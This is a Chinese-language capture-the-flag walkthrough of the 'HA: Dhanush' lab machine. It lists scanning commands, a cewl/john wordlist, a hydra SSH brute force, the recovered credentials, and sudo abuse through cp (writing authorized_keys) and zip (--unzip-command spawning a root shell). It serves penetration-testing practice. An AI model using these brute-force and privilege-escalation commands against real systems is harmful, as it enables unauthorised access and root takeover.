HA: Dhanush靶机渗透测试
文章目錄
- 一、信息收集
- 1.主機(jī)發(fā)現(xiàn)
- 2.端口掃描
- 3.查看 web 服務(wù)
- 二、漏洞挖掘
- 1.使用 cewl 生成字典
- 2.使用 hydra 進(jìn)行爆破
- 3.ssh 連接
- 4.嘗試 sudo 提權(quán)
靶機(jī)介紹:
一、信息收集
1.主機(jī)發(fā)現(xiàn)
arp-scan -l
發(fā)現(xiàn)靶機(jī) ip:192.168.1.119
2.端口掃描
nmap -A -p- 192.168.1.119
發(fā)現(xiàn)開放了 80 端口,Apache 服務(wù),ubuntu系統(tǒng);
65345 端口,ssh 服務(wù)
3.查看 web 服務(wù)
訪問 192.168.1.119:
發(fā)現(xiàn)介紹 dhanush,沒有什么特別的
二、漏洞挖掘
1.使用 cewl 生成字典
沒有什么信息,根據(jù)提示:枚舉,我們嘗試從靶機(jī)的 web 服務(wù)生成 ssh 登陸的賬號密碼進(jìn)行遍歷爆破
cewl http://192.168.1.119/ -w dict.txt #生成密碼
john --wordlist=dict.txt --stdout --rules > ./users.txt #生成用戶名列表
2.使用 hydra 進(jìn)行爆破
hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30
爆破時間較長,大概需要 10 分鐘左右
3.ssh 連接
ssh pinak@192.168.1.119 -p 65345
yes
Gandiv
4.嘗試 sudo 提權(quán)
發(fā)現(xiàn)可以以 sarang 用戶權(quán)限使用 cp,查看該用戶信息
發(fā)現(xiàn) sarang 路徑下有 .ssh 目錄,嘗試進(jìn)入但是沒有權(quán)限,結(jié)合 sudo -l 得到的可以 sarang 權(quán)限執(zhí)行 cp ,嘗試在當(dāng)前用戶創(chuàng)建 ssh,將公鑰復(fù)制到 sarang 路徑去然后使用 ssh 連接
cd ~
ssh-keygen #生成ssh密鑰(我這里是一直回車無密碼)
chmod 777 ./.ssh/id_rsa.pub
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
經(jīng)過一番操作可以看到我們進(jìn)入了 sarang 用戶
再次嘗試 sudo 提權(quán)
發(fā)現(xiàn)可以以 root 權(quán)限執(zhí)行 zip 命令,進(jìn)行利用獲得 root 權(quán)限
touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root
總結(jié)
以上是生活随笔為你收集整理的HA: Dhanush靶机渗透测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Lampiao靶机渗透测试
- 下一篇: HA: Forensics靶机渗透测试